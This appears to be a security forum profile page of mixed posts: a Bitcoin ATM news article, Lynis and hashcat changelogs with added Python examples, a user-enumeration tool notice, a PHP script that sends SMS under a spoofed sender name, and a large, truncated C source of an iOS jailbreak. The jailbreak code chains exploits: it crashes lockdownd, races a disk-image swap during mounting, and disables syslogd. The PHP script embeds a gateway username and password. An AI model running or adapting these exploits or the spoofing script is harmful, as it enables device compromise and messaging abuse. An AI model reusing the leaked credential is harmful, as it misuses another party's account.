Everything posted by Nytro

  1. Bitcoin ATMs Are Spreading Across the World
     By Brian Patrick Eha | December 31, 2013

     Sometimes the future can sneak up on you. Like when you find out that a startup incorporated in the British Virgin Islands, whose employees live in New Hampshire and whose products are made in Portugal, is selling digital-currency ATMs to Saudi Arabia and Singapore.

     These are only two of the countries that have purchased Bitcoin ATMs from manufacturer Lamassu, which announced Monday that it had sold 120 of the machines to customers all over the world. A map Lamassu created to mark the occasion, showing the far-flung sales locations of its Bitcoin ATMs, not coincidentally illustrates the global appeal of Bitcoin. Zach Harvey, Lamassu's chief executive, said as much in a press release.

     "We will be shipping to 25 different countries, ranging from Canada to Kyrgyzstan, and we've translated our user interface into more than a dozen languages, including Russian, Chinese and Friulian," Harvey said.

     Lamassu has delivered about a dozen ATMs so far, with plans to ship the others in spring 2014.

     In October 2013, another company, Robocoin, made headlines for its Bitcoin ATM, said to be the first in the world that was available to the public, when one of its machines was installed in a coffee house in Vancouver. Within its first month in operation, the ATM had processed more than CAD$1 million in transactions.

     Robocoin's machine, which costs $20,000, or four to five times as much as Lamassu's (the company offers price discounts for bulk orders), can be used both to buy bitcoins with paper bills and to withdraw cash by selling bitcoins. Lamassu's table-top ATM, which is much more compact than Robocoin's kiosk, cannot provide cash in exchange for bitcoins, only the other way around.

     Although Bitcoin ATMs are still in their infancy, they already represent a contentious space, in which each company is jealous of its claim to fame. After Business Insider Australia reported Monday that a company called 21st Century Bitcoin Exchange was setting up the first Bitcoin ATM in Australia, Lamassu corrected the news site on Twitter, saying it had already installed one of its own ATMs in Melbourne, with "about 15 more on their way."

     Robocoin's chief executive, for his part, took a shot at buy-only machines such as Lamassu's when his company's ATM debuted this past August. "Seriously, how bush league is an 'ATM' if it can't do the equivalent of deposits and withdrawals?" Robocoin CEO Jordan Kelley said.

     Lamassu will be presenting its Bitcoin ATM for trial use at the CES Startup Debut event in Las Vegas on January 5, prior to the Consumer Electronics Show that will kick off two days later. After one of Lamassu's machines was installed in Bratislava, Slovakia, a local man named Juraj Bednár created a demonstration of how easy it is to use.

     "It's always exciting for a young startup to have sales ramp up," Harvey said in the release. "But what's really thrilling for us is to know that these will be out in the wild, providing millions of people with effortless access to Bitcoin every single day."

     Source: Bitcoin ATMs Are Spreading Across the World | Entrepreneur.com
  2. I don't know if it works, or whether it works in Romania:

         <?php
         if(!empty($_POST["message"])) {
             // read the submitted form fields
             $to = $_POST["to"];
             $from = $_POST["from"];
             $message = $_POST["message"];

             // refuse to send to a number that already appears in numbers.txt
             $numbers = file_get_contents("numbers.txt");
             if(preg_match_all("/^.*$to.*\$/m", $numbers, $matches))
                 die("?? ???? ????? ??? ???? ??????????? ????????.");

             // send the SMS through the gateway; a numeric reply means success
             $result = file_get_contents("http://api.fastsms.pro/send.php?username=Fmsg&password=b236d1aae3720b19d68255d23f42d096&useDirect=1&sender=$from&numbers=$to&message=".urlencode($message));
             if(is_numeric($result))
                 echo("????????? ??????????");
             else
                 die("?????? ????????: $result.");

             // append the number to numbers.txt so it is not messaged again
             $file = fopen("numbers.txt", "a");
             fwrite($file, "$to\n");
             fclose($file);
             die();
         }
         ?>
         <form action='index.php' method='POST'>
         <table>
         <tr>
             <td>??? ???????????:</td>
             <td><input name='from' type='text' value='DedMoroz' readonly></td>
         </tr>
         <tr>
             <td>????? ??????????:</td>
             <td><input name='to' type='text' value=''></td>
         </tr>
         <tr>
             <td>????? ?????????:</td>
             <td><input name='message' type='text' value='???? ???? ????' readonly></td>
         </tr>
         <tr>
             <td><button type='submit'>?????????</button></td>
         </tr>
         </table>
         </form>

     Source: http://pastebin.com/raw.php?i=88UY7t2Z
  3. 30c3: To Protect And Infect, Part 2, by Jacob "@ioerror" Appelbaum
  4. Lynis, the Unix/Linux hardening tool, updated to v1.3.8

     Lynis is a security tool to audit and harden Unix and Linux based systems. It scans the system by performing many security control checks, looks for installed software and determines compliance to standards. It also detects security issues and errors in configuration. At the end of the scan it will provide the warnings and suggestions to help you improve the security defense of your systems.

     Some of the (future) features and usage options:
       • System and security audit checks
       • File Integrity Assessment
       • System and file forensics
       • Usage of templates/baselines (reporting and monitoring)
       • Extended debugging features

     This tool is tested or confirmed to work with: AIX, Linux, FreeBSD, OpenBSD, Mac OS X, Solaris

     Changelog
       • New parameter --view-categories to display available test categories
       • Added /etc/hosts check (duplicates) [NAME-4402]
       • Added /etc/hosts check (hostname) [NAME-4404]
       • Added /etc/hosts check (localhost mapping) [NAME-4406]
       • Portmaster test for possible port upgrades [PKGS-7378]
       • Check for SPARC improve boot loader (SILO) [BOOT-5142]
       • NFS client access test [STRG-1930]
       • Check system uptime [BOOT-5202]
       • YUM repolist check [PKGS-7383]
       • Contributors file added
       • Improved locate database check and reporting [FILE-6410]
       • Improved PAE/No eXecute test for Linux kernel [KRNL-5677]
       • Disabled NIS domain name from test [NAME-4028]
       • Extended NIS domain test to check BSD sysctl value [NAME-4306]
       • Extended PAM tools check with PAM paths [AUTH-9262]
       • Adjusted Apache check to avoid skipping it [HTTP-6622]
       • Extended USB state testing [STRG-1840]
       • Extended Firewire state testing [STRG-1846]
       • Extended core dump test [KRNL-5820]
       • Added /lib/i386-linux-gnu/security to PAM directories
       • Added /usr/X11R6/bin directory to binary paths
       • Improved readability of screen output
       • Improved logging for several tests
       • Improved Debian version detection
       • Added warning to BIND test [NAME-4206]
       • Extended binaries with showmount and yum
       • Updated man page

     Source: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
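The three /etc/hosts checks introduced in this release (duplicates, hostname, localhost mapping) are easy to reproduce as a standalone audit. The Python below is an added example written for this page; it is not Lynis's own code (Lynis is a shell script and its exact test logic is not shown here). It parses a constructed sample hosts file embedded inline and reports findings in the WARNING/SUGGESTION style the tool uses. The system hostname is passed in as a parameter rather than read from the machine, and the duplicate check only flags a name that maps to more than one address within the same address family, so the conventional 127.0.0.1/::1 pair for localhost is not reported as a duplicate.

```python
from typing import Dict, List, Tuple

# Constructed sample /etc/hosts content for this example, not a real system file.
SAMPLE_HOSTS = """\
# loopback
127.0.0.1   localhost
::1         localhost ip6-localhost ip6-loopback

# internal servers
192.168.1.10  build01.example.internal build01
192.168.1.11  build01            # same short name on a second address
10.0.0.5      ldap.example.internal
"""

Entry = Tuple[str, List[str]]
LOOPBACK = {"127.0.0.1", "::1"}


def parse_hosts(text: str) -> List[Entry]:
    """Return (address, [names...]) for each non-comment, non-blank line."""
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                          # address without a name: nothing to check
        entries.append((fields[0], fields[1:]))
    return entries


def duplicate_names(entries: List[Entry]) -> Dict[str, List[str]]:
    """Names mapped to more than one address of the same family (NAME-4402 analogue)."""
    seen: Dict[Tuple[str, str], List[str]] = {}
    for ip, names in entries:
        family = "ipv6" if ":" in ip else "ipv4"
        for name in names:
            seen.setdefault((name, family), []).append(ip)
    dups: Dict[str, List[str]] = {}
    for (name, _family), ips in seen.items():
        if len(ips) > 1:
            dups.setdefault(name, []).extend(ips)
    return dups


def hostname_present(entries: List[Entry], hostname: str) -> bool:
    """Is the system's own hostname mapped in the file? (NAME-4404 analogue)"""
    return any(hostname in names for _ip, names in entries)


def localhost_addresses(entries: List[Entry]) -> List[str]:
    """Every address that 'localhost' resolves to via the file (NAME-4406 analogue)."""
    return [ip for ip, names in entries if "localhost" in names]


def audit_hosts(text: str, hostname: str) -> List[str]:
    """Run the three checks and return Lynis-style findings (empty list = clean)."""
    entries = parse_hosts(text)
    findings: List[str] = []
    for name, ips in sorted(duplicate_names(entries).items()):
        findings.append(f"WARNING duplicate hostname {name} -> {', '.join(ips)}")
    if not hostname_present(entries, hostname):
        findings.append(f"SUGGESTION add hostname {hostname} to /etc/hosts")
    lh = localhost_addresses(entries)
    # localhost must exist and point only at loopback space
    if not lh or not all(ip in LOOPBACK or ip.startswith("127.") for ip in lh):
        findings.append(f"WARNING localhost mapped to {', '.join(lh) or 'nothing'}")
    return findings


if __name__ == "__main__":
    for line in audit_hosts(SAMPLE_HOSTS, "build01") or ["OK no findings"]:
        print(line)
```

Against a real system, replace SAMPLE_HOSTS with the contents of /etc/hosts and pass the output of the hostname command; a non-empty result list is the equivalent of Lynis's warnings and suggestions for these three tests.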
  5. Kacak v0.1 released – Enumerate users in subnets

     Kacak is a tool that can enumerate users specified in the configuration file for Windows based networks. It uses the Metasploit smb_enumusers_domain module in order to achieve this via the msfrpcd service. If you are wondering what the msfrpcd service is, please look at https://github.com/rapid7/metasploit-framework/blob/master/documentation/msfrpc.txt . It also parses mimikatz results.

     Submitted by Gokhan ALKAN (Tool’s author)

     Source: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
  6. hashcat v0.47 (Advanced Password Recovery) Released

     Hashcat is the world’s fastest CPU-based password recovery tool. While it’s not as fast as its GPU counterparts oclHashcat-plus and oclHashcat-lite, large lists can be easily split in half with a good dictionary and a bit of knowledge of the command switches.

     Changelog v0.47
       • added -m 123 = EPi
       • added -m 1430 = sha256(unicode($pass).$salt)
       • added -m 1440 = sha256($salt.unicode($pass))
       • added -m 1441 = EPiServer 6.x >= v4
       • added -m 1711 = SSHA-512(Base64), LDAP {SSHA512}
       • added -m 1730 = sha512(unicode($pass).$salt)
       • added -m 1740 = sha512($salt.unicode($pass))
       • added -m 7400 = SHA-256(Unix)
       • added -m 7600 = Redmine SHA1
       • debug mode can now be used also together with -g, generate rule
       • support added for using external salts together with mode 160 = HMAC-SHA1 (key = $salt)
       • allow empty salt/key for HMAC algos
       • allow variable rounds for hash modes 500, 1600, 1800, 3300, 7400 using rounds= specifier
       • added --generate-rules-seed, sets seed used for randomization so rulesets can be reproduced
       • added output-format type 8 (position:hash:plain)
       • updated/added some hcchr charset files in /charsets, some new files: Bulgarian, Polish, Hungarian
       • format output when using --show according to the --outfile-format option
       • show mask length in status screen
       • --disable-potfile in combination with --show or --left resulted in a crash, combination was disallowed

     Features
       • Multi-Threaded
       • Free
       • Multi-Hash (up to 24 million hashes)
       • Multi-OS (Linux, Windows and OSX native binaries)
       • Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …)
       • SSE2, AVX and XOP accelerated
       • All Attack-Modes except Brute-Force and Permutation can be extended by rules
       • Very fast Rule-engine
       • Rules compatible with JTR and PasswordsPro
       • Possible to resume or limit session
       • Automatically recognizes recovered hashes from outfile at startup
       • Can automatically generate random rules
       • Load saltlist from external file and then use them in a Brute-Force Attack variant
       • Able to work in a distributed environment
       • Specify multiple wordlists or multiple directories of wordlists
       • Number of threads can be configured
       • Threads run on lowest priority
       • Supports hex-charset
       • Supports hex-salt
       • 90+ Algorithms implemented with performance in mind
       • …and much more

     More Information: hashcat Wiki

     Source: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
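Several of the new hash modes differ only in how the password and salt are concatenated and in what unicode($pass) means: hashcat encodes the password as UTF-16LE, the same encoding NTLM uses, so an ASCII password gains a zero byte after every character and hashes differently from the plain ASCII form. The Python below is an added example for this page, not hashcat's own code. It builds the 1430/1440/1730/1740 digests from a constructed password and salt, and builds and verifies an LDAP {SSHA512} value (mode 1711), where the base64 payload is the raw 64-byte sha512 digest followed by the salt, so a verifier can recover the salt from the stored value. The sample password and salt are constructed for the example.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional

# Constructed sample credential for this example, not from the page.
SAMPLE_PASSWORD = "correct horse battery"
SAMPLE_SALT = b"NaCl"


def unicode_pass(password: str) -> bytes:
    """hashcat's unicode($pass): the password encoded as UTF-16LE (as for NTLM)."""
    return password.encode("utf-16-le")


def mode_1430(password: str, salt: bytes) -> str:
    """-m 1430 = sha256(unicode($pass).$salt)"""
    return hashlib.sha256(unicode_pass(password) + salt).hexdigest()


def mode_1440(password: str, salt: bytes) -> str:
    """-m 1440 = sha256($salt.unicode($pass))"""
    return hashlib.sha256(salt + unicode_pass(password)).hexdigest()


def mode_1730(password: str, salt: bytes) -> str:
    """-m 1730 = sha512(unicode($pass).$salt)"""
    return hashlib.sha512(unicode_pass(password) + salt).hexdigest()


def mode_1740(password: str, salt: bytes) -> str:
    """-m 1740 = sha512($salt.unicode($pass))"""
    return hashlib.sha512(salt + unicode_pass(password)).hexdigest()


SSHA512_PREFIX = "{SSHA512}"
SHA512_LEN = 64  # raw digest length in bytes


def ldap_ssha512_store(password: str, salt: Optional[bytes] = None) -> str:
    """-m 1711 = SSHA-512(Base64), LDAP {SSHA512}: base64(sha512($pass.$salt) . $salt).

    A fresh random salt is generated when none is supplied.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.sha512(password.encode("utf-8") + salt).digest()
    return SSHA512_PREFIX + base64.b64encode(digest + salt).decode("ascii")


def ldap_ssha512_verify(password: str, stored: str) -> bool:
    """Check a password against a stored {SSHA512} value.

    The salt is whatever follows the 64-byte digest inside the base64 payload,
    so the caller does not need to know it separately.
    """
    if not stored.startswith(SSHA512_PREFIX):
        return False
    try:
        blob = base64.b64decode(stored[len(SSHA512_PREFIX):], validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    if len(blob) < SHA512_LEN:
        return False
    digest, salt = blob[:SHA512_LEN], blob[SHA512_LEN:]
    recomputed = hashlib.sha512(password.encode("utf-8") + salt).digest()
    # constant-time comparison so verification timing does not leak digest bytes
    return hmac.compare_digest(digest, recomputed)


if __name__ == "__main__":
    print("1430:", mode_1430(SAMPLE_PASSWORD, SAMPLE_SALT))
    print("1440:", mode_1440(SAMPLE_PASSWORD, SAMPLE_SALT))
    print("1730:", mode_1730(SAMPLE_PASSWORD, SAMPLE_SALT))
    print("1740:", mode_1740(SAMPLE_PASSWORD, SAMPLE_SALT))
    stored = ldap_ssha512_store(SAMPLE_PASSWORD)
    print("1711:", stored, "verifies:", ldap_ssha512_verify(SAMPLE_PASSWORD, stored))
```

With an empty password and empty salt (the changelog notes that empty salts are now accepted) modes 1430 and 1730 reduce to the well-known sha256 and sha512 digests of the empty string, which makes a convenient sanity check of the concatenation order and encoding.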
  7. pris0nbarake - jailbreak.c
     Exploits from evasi0n and absinthe2. And others.

         /***
          * pris0nbarake - jailbreak.c
          *
          * Exploits from evasi0n and absinthe2. And others.
          *
          * This program is free software: you can redistribute it and/or modify
          * it under the terms of the GNU General Public License as published by
          * the Free Software Foundation, either version 3 of the License, or
          * (at your option) any later version.
          *
          * This program is distributed in the hope that it will be useful,
          * but WITHOUT ANY WARRANTY; without even the implied warranty of
          * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
          * GNU General Public License for more details.
          *
          * You should have received a copy of the GNU General Public License
          * along with this program. If not, see <http://www.gnu.org/licenses/>.
          **/

         #include <stdio.h>
         #include <stdlib.h>
         #include <string.h>
         #include <unistd.h>
         #include <getopt.h>
         #include <dirent.h>
         #include <signal.h>
         #include <plist/plist.h>
         #include <sys/types.h>
         #include <sys/stat.h>
         #include <sys/errno.h>
         #include <assert.h>
         #include <libimobiledevice/libimobiledevice.h>
         #include <libimobiledevice/lockdown.h>
         #include <libimobiledevice/mobile_image_mounter.h>
         #include <libimobiledevice/mobilebackup2.h>
         #include <libimobiledevice/notification_proxy.h>
         #include <libimobiledevice/afc.h>
         #include <libimobiledevice/sbservices.h>
         #include <libimobiledevice/file_relay.h>
         #include <libimobiledevice/diagnostics_relay.h>
         #include <zlib.h>
         #include <fcntl.h>
         #include <sys/mman.h>

         #include "partialcommon.h"
         #include "partial.h"
         #include "common.h"
         #include "MobileDevice.h"

         #define AFCTMP "HackStore"

         typedef struct _compatibility {
             char *product;
             char *build;
         } compatibility_t;

         compatibility_t compatible_devices[] = {
             {"N81AP", "10B400"},
             {"N41AP", "10B350"},
             {"N42AP", "10B350"},
             {"N94AP", "10B329"},
             {"N90BAP", "10B329"},
             {"N90AP", "10B329"},
             {"N92AP", "10B329"},
             {"N81AP", "10B329"},
             {"N88AP", "10B329"},
             {"N78AP", "10B329"},
             {"N41AP", "10B329"},
             {"N42AP", "10B329"},
             {"J1AP", "10B329"},
             {"J2AP", "10B329"},
             {"J2aAP", "10B329"},
             {"P101AP", "10B329"},
             {"P102AP", "10B329"},
             {"P103AP", "10B329"},
             {"K93AP", "10B329"},
             {"K93AAP", "10B329"},
             {"K94AP", "10B329"},
             {"K95AP", "10B329"},
             {"P105AP", "10B329"},
             {"P106AP", "10B329"},
             {"P107AP", "10B329"},
             {NULL, NULL}
         };

         static int cpio_get_file_name_length(void *cpio)
         {
             if (cpio) {
                 char buffer[7];
                 int val;
                 memset(buffer, '\0', 7);
                 memcpy(&buffer, (void *) (cpio + 59), 6); /* File Name Length */
                 val = strtoul(buffer, NULL, 8);
                 return val;
             } else {
                 return 0;
             }
         }

         static int cpio_get_file_length(void *cpio)
         {
             if (cpio) {
                 char buffer[12];
                 int val;
                 memset(buffer, '\0', 12);
                 memcpy(&buffer, (void *) (cpio + 65), 11); /* File Length */
                 val = strtoul(buffer, NULL, 8);
                 return val;
             } else {
                 return 0;
             }
         }

         /* recursively remove path, including path */
         static void rmdir_recursive(const char *path)
         { /*{{{ */
             if (!path) {
                 return;
             }
             DIR *cur_dir = opendir(path);
             if (cur_dir) {
                 struct dirent *ep;
                 while ((ep = readdir(cur_dir))) {
                     if ((strcmp(ep->d_name, ".") == 0) || (strcmp(ep->d_name, "..") == 0)) {
                         continue;
                     }
                     char *fpath = (char *) malloc(strlen(path) + 1 + strlen(ep->d_name) + 1);
                     if (fpath) {
                         struct stat st;
                         strcpy(fpath, path);
                         strcat(fpath, "/");
                         strcat(fpath, ep->d_name);
                         if ((stat(fpath, &st) == 0) && S_ISDIR(st.st_mode)) {
                             rmdir_recursive(fpath);
                         } else {
                             if (remove(fpath) != 0) {
                                 DEBUG("could not remove file %s: %s\n", fpath, strerror(errno));
                             }
                         }
                         free(fpath);
                     }
                 }
                 closedir(cur_dir);
             }
             if (rmdir(path) != 0) {
                 fprintf(stderr, "could not remove directory %s: %s\n", path, strerror(errno));
             }
         } /*}}} */

         static void print_xml(plist_t node)
         {
             char *xml = NULL;
             uint32_t len = 0;
             plist_to_xml(node, &xml, &len);
             if (xml)
                 puts(xml);
         }

         /* char** freeing helper function */
         static void free_dictionary(char **dictionary)
         { /*{{{ */
             int i = 0;
             if (!dictionary)
                 return;
             for (i = 0; dictionary[i]; i++) {
                 free(dictionary[i]);
             }
             free(dictionary);
         } /*}}} */

         /* recursively remove path via afc, (incl = 1 including path, incl = 0, NOT including path) */
         static int rmdir_recursive_afc(afc_client_t afc, const char *path, int incl)
         { /*{{{ */
             char **dirlist = NULL;
             if (afc_read_directory(afc, path, &dirlist) != AFC_E_SUCCESS) {
                 //fprintf(stderr, "AFC: could not get directory list for %s\n", path);
                 return -1;
             }
             if (dirlist == NULL) {
                 if (incl) {
                     afc_remove_path(afc, path);
                 }
                 return 0;
             }
             char **ptr;
             for (ptr = dirlist; *ptr; ptr++) {
                 if ((strcmp(*ptr, ".") == 0) || (strcmp(*ptr, "..") == 0)) {
                     continue;
                 }
                 char **info = NULL;
                 char *fpath = (char *) malloc(strlen(path) + 1 + strlen(*ptr) + 1);
                 strcpy(fpath, path);
                 strcat(fpath, "/");
                 strcat(fpath, *ptr);
                 if ((afc_get_file_info(afc, fpath, &info) != AFC_E_SUCCESS) || !info) {
                     // failed. try to delete nevertheless.
                     afc_remove_path(afc, fpath);
                     free(fpath);
                     free_dictionary(info);
                     continue;
                 }
                 int is_dir = 0;
                 int i;
                 for (i = 0; info[i]; i += 2) {
                     if (!strcmp(info[i], "st_ifmt")) {
                         if (!strcmp(info[i + 1], "S_IFDIR")) {
                             is_dir = 1;
                         }
                         break;
                     }
                 }
                 free_dictionary(info);
                 if (is_dir) {
                     rmdir_recursive_afc(afc, fpath, 0);
                 }
                 afc_remove_path(afc, fpath);
                 free(fpath);
             }
             free_dictionary(dirlist);
             if (incl) {
                 afc_remove_path(afc, path);
             }
             return 0;
         } /*}}} */

         static int connected = 0;

         void jb_device_event_cb(const idevice_event_t * event, void *user_data)
         {
             char *uuid = (char *) user_data;
             DEBUG("device event %d: %s\n", event->event, event->udid);
             if (uuid && strcmp(uuid, event->udid))
                 return;
             if (event->event == IDEVICE_DEVICE_ADD) {
                 connected = 1;
             } else if (event->event == IDEVICE_DEVICE_REMOVE) {
                 connected = 0;
             }
         }

         static void idevice_event_cb(const idevice_event_t * event, void *user_data)
         {
             jb_device_event_cb(event, user_data);
         }

         typedef struct __csstores {
             uint32_t csstore_number;
         } csstores_t;

         static csstores_t csstores[16];
         static int num_of_csstores = 0;

         int check_consistency(char *product, char *build)
         {
             // Seems legit.
             return 0;
         }

         int verify_product(char *product, char *build)
         {
             compatibility_t *curcompat = &compatible_devices[0];
             while ((curcompat) && (curcompat->product != NULL)) {
                 if (!strcmp(curcompat->product, product) && !strcmp(curcompat->build, build))
                     return 0;
                 curcompat++;
             }
             return 1;
         }

         const char *lastmsg = NULL;

         static void status_cb(const char *msg, int progress)
         {
             if (!msg) {
                 msg = lastmsg;
             } else {
                 lastmsg = msg;
             }
             DEBUG("[%d%%] %s\n", progress, msg);
         }

         #ifndef __GUI__
         int main(int argc, char *argv[])
         {
             device_t *device = NULL;
             char *uuid = NULL;
             char *product = NULL;
             char *build = NULL;
             int old_os = 0;

             /********************************************************/
             /*
              * device detection
              */
             /********************************************************/
             if (!uuid) {
                 device = device_create(NULL);
                 if (!device) {
                     ERROR("No device found, is it plugged in?\n");
                     return -1;
                 }
                 uuid = strdup(device->uuid);
             } else {
                 DEBUG("Detecting device...\n");
                 device = device_create(uuid);
                 if (device == NULL) {
                     ERROR("Unable to connect to device\n");
                     return -1;
                 }
             }
             DEBUG("Connected to device with UUID %s\n", uuid);

             lockdown_t *lockdown = lockdown_open(device);
             if (lockdown == NULL) {
                 ERROR("Lockdown connection failed\n");
                 device_free(device);
                 return -1;
             }
             if ((lockdown_get_string(lockdown, "HardwareModel", &product) != LOCKDOWN_E_SUCCESS)
                 || (lockdown_get_string(lockdown, "BuildVersion", &build) != LOCKDOWN_E_SUCCESS)) {
                 ERROR("Could not get device information\n");
                 lockdown_free(lockdown);
                 device_free(device);
                 return -1;
             }
             DEBUG("Device is a %s with build %s\n", product, build);
             if (verify_product(product, build) != 0) {
                 ERROR("Device is not supported\n");
                 return -1;
             }

             plist_t pl = NULL;
             lockdown_get_value(lockdown, NULL, "ActivationState", &pl);
             if (pl && plist_get_node_type(pl) == PLIST_STRING) {
                 char *as = NULL;
                 plist_get_string_val(pl, &as);
                 plist_free(pl);
                 if (as) {
                     if (strcmp(as, "Unactivated") == 0) {
                         free(as);
                         ERROR("The attached device is not activated. You need to activate it before it can be used with this jailbreak.\n");
                         lockdown_free(lockdown);
                         device_free(device);
                         return -1;
                     }
                     free(as);
                 }
             }

             pl = NULL;
             lockdown_get_value(lockdown, "com.apple.mobile.backup", "WillEncrypt", &pl);
             if (pl && plist_get_node_type(pl) == PLIST_BOOLEAN) {
                 char c = 0;
                 plist_get_bool_val(pl, &c);
                 plist_free(pl);
                 if (c) {
                     ERROR("You have a device backup password set. You need to disable the backup password in iTunes.\n");
                     lockdown_free(lockdown);
                     device_free(device);
                     return -1;
                 }
             }

             lockdown_free(lockdown);
             device_free(device);
             device = NULL;

             idevice_event_subscribe(idevice_event_cb, uuid);
             jailbreak_device(uuid, status_cb);
             return 0;
         }
         #endif

         static void plist_replace_item(plist_t plist, char *name, plist_t item)
         {
             if (plist_dict_get_item(plist, name))
                 plist_dict_remove_item(plist, name);
             plist_dict_insert_item(plist, name, item);
         }

         kern_return_t send_message(service_conn_t socket, CFPropertyListRef plist);
         CFPropertyListRef receive_message(service_conn_t socket);

         static char *real_dmg, *real_dmg_signature, *ddi_dmg;

         static void print_data(CFDataRef data)
         {
             if (data == NULL) {
                 DEBUG("[null]\n");
                 return;
             }
             DEBUG("[%.*s]\n", (int) CFDataGetLength(data), CFDataGetBytePtr(data));
         }

         void qwrite(afc_connection * afc, const char *from, const char *to)
         {
             DEBUG("Sending %s -> %s... ", from, to);
             afc_file_ref ref;
             int fd = open(from, O_RDONLY);
             assert(fd != -1);
             size_t size = (size_t) lseek(fd, 0, SEEK_END);
             void *buf = mmap(NULL, size, PROT_READ, MAP_SHARED, fd, 0);
             assert(buf != MAP_FAILED);
             AFCFileRefOpen(afc, to, 3, &ref);
             AFCFileRefWrite(afc, ref, buf, size);
             AFCFileRefClose(afc, ref);
             DEBUG("done.\n");
             close(fd);
         }

         int timesl, tries = 0;
         volatile int is_ddid = 0;

         #undef assert
         #define assert(x) (x) /* badcode is bad */

         static void cb2(am_device_notification_callback_info * info, void *foo)
         {
             timesl = 1000;
             struct am_device *dev;
             DEBUG("... %x\n", info->msg);
             if (is_ddid)
                 CFRunLoopStop(CFRunLoopGetCurrent());
             if (info->msg == ADNCI_MSG_CONNECTED) {
                 dev = info->dev;
                 tries++;
                 if (tries >= 30) {
                     is_ddid = -1;
                     return;
                 }
                 AMDeviceConnect(dev);
                 assert(AMDeviceIsPaired(dev));
                 assert(!AMDeviceValidatePairing(dev));
                 assert(!AMDeviceStartSession(dev));
                 CFStringRef product = AMDeviceCopyValue(dev, 0, CFSTR("ProductVersion"));
                 assert(product);
                 UniChar first = CFStringGetCharacterAtIndex(product, 0);
                 int epoch = first - '0';
         Retry:
                 printf(".");
                 fflush(stdout);
                 service_conn_t afc_socket = 0;
                 struct afc_connection *afc = NULL;
                 assert(!AMDeviceStartService(dev, CFSTR("com.apple.afc"), &afc_socket, NULL));
                 assert(!AFCConnectionOpen(afc_socket, 0, &afc));
                 assert(!AFCDirectoryCreate(afc, "PublicStaging"));
                 AFCRemovePath(afc, "PublicStaging/staging.dimage");
                 qwrite(afc, real_dmg, "PublicStaging/staging.dimage");
                 if (ddi_dmg)
                     qwrite(afc, ddi_dmg, "PublicStaging/ddi.dimage");
                 service_conn_t mim_socket1 = 0;
                 service_conn_t mim_socket2 = 0;
                 assert(!AMDeviceStartService(dev, CFSTR("com.apple.mobile.mobile_image_mounter"), &mim_socket1, NULL));
                 assert(mim_socket1);
                 CFPropertyListRef result = NULL;
                 CFMutableDictionaryRef dict = CFDictionaryCreateMutable(NULL, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
                 CFDictionarySetValue(dict, CFSTR("Command"), CFSTR("MountImage"));
                 CFDictionarySetValue(dict, CFSTR("ImageType"), CFSTR("Developer"));
                 CFDictionarySetValue(dict, CFSTR("ImagePath"), CFSTR("/var/mobile/Media/PublicStaging/staging.dimage"));
                 int fd = open(real_dmg_signature, O_RDONLY);
                 assert(fd != -1);
                 uint8_t sig[128];
                 assert(read(fd, sig, sizeof(sig)) == sizeof(sig));
                 close(fd);
                 CFDictionarySetValue(dict, CFSTR("ImageSignature"), CFDataCreateWithBytesNoCopy(NULL, sig, sizeof(sig), kCFAllocatorNull));
                 send_message(mim_socket1, dict);
                 if (ddi_dmg) {
                     DEBUG("sleep %d\n", timesl);
                     usleep(timesl);
                     assert(!AFCRenamePath(afc, "PublicStaging/ddi.dimage", "PublicStaging/staging.dimage"));
                 }
                 DEBUG("receive 1:\n");
                 result = receive_message(mim_socket1);
                 print_data(CFPropertyListCreateXMLData(NULL, result));
                 if (strstr(CFDataGetBytePtr(CFPropertyListCreateXMLData(NULL, result)), "ImageMountFailed")) {
                     timesl += 100;
                     goto Retry;
                 }
                 is_ddid = 1;
                 CFRunLoopStop(CFRunLoopGetCurrent());
                 fflush(stdout);
             }
         }

         void stroke_lockdownd(device_t * device)
         {
             plist_t crashy = plist_new_dict();
             char *request = NULL;
             unsigned int size = 0;
             idevice_connection_t connection;
             uint32_t magic;
             uint32_t sent = 0;
             plist_dict_insert_item(crashy, "Request", plist_new_string("Pair"));
             plist_dict_insert_item(crashy, "PairRecord", plist_new_bool(0));
             plist_to_xml(crashy, &request, &size);
             magic = __builtin_bswap32(size);
             plist_free(crashy);
             if (idevice_connect(device->client, 62078, &connection)) {
                 ERROR("Failed to connect to lockdownd.\n");
             }
             idevice_connection_send(connection, &magic, 4, &sent);
             idevice_connection_send(connection, request, size, &sent);
             idevice_connection_receive_timeout(connection, &size, 4, &sent, 1500);
             size = __builtin_bswap32(size);
             if (size) {
                 void *ptr = malloc(size);
                 idevice_connection_receive_timeout(connection, ptr, &size, &sent, 5000);
             }
             idevice_disconnect(connection);
             // XXX: Wait for lockdownd to start.
             sleep(5);
         }

         struct mobile_image_mounter_client_private {
             void *parent;
             void *mutex;
         };

         char* overrides_plist =
             "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
             "<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n"
             "<plist version=\"1.0\">\n"
             "<dict>\n"
             " <key>com.apple.syslogd</key>\n"
             " <dict>\n"
             " <key>Disabled</key>\n"
             " <true/>\n"
             " </dict>\n"
             "</dict>\n"
             "</plist>\n";

         void callback(ZipInfo* info, CDFile* file, size_t progress)
         {
             int percentDone = progress * 100/file->compressedSize;
             printf("Getting: %d%%\n", percentDone);
         }

         int jailbreak_device(const char *uuid, status_cb_t cb)
         {
             char backup_dir[1024];
             device_t *device = NULL;
             char *build = NULL;
             char *product = NULL;
             struct lockdownd_service_descriptor desc = { 0, 0 };
             int is_jailbroken = 0;

             if (!uuid) {
                 ERROR("Missing device UDID\n");
                 return -1;
             }
             assert(cb);

             tmpnam(backup_dir);
             DEBUG("Backing up files to %s\n", backup_dir);

             // Wait for a connection
             DEBUG("Connecting to device...\n");
             cb("Connecting to device...\n", 2);
             int retries = 20;
             int i = 0;
             while (!connected && (i++ < retries)) {
                 sleep(1);
             }
